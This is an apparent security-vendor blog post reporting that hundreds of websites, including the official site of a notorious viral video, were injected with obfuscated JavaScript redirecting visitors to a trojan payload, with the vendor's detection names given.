Viral Video Now Just Viral

…well actually it’s a trojan, but it’s still malicious!

For those who had the misfortune of watching the viral video 2 Girls 1 Cup (SFW Wikipedia link) that spread across the internet like wildfire a couple years ago, people trying to sign up to view the video on the official site will now get more than they bargained for.

In fact, there are actually hundreds of compromised domains across the internet which we’ve seen over the last few days that have been infected. It seems some obfuscated javascript is being injected into these sites, which attempts to redirect the user to another domain hosting a malicious payload.

As you can see there’s nothing overly complicated about the obfuscation technique, it’s a simple matter of them escaping certain characters, and inserting a symbol at random intervals in the text. After deobfuscating the code, we see another script tag is written which points to the domain where the payload is hosted.

At the time of writing this blog the payload is no longer on the site but we suspect it will reappear sometime in the near future.

Earlier in the week we detected a file at the script target URL as Troj/SWFLdr-A but that file is no longer available.

Instead users are greeted with a simple message saying “// No news…”. Customers will be happy to know that the original javascript redirector is detected as Troj/JSRedir-R.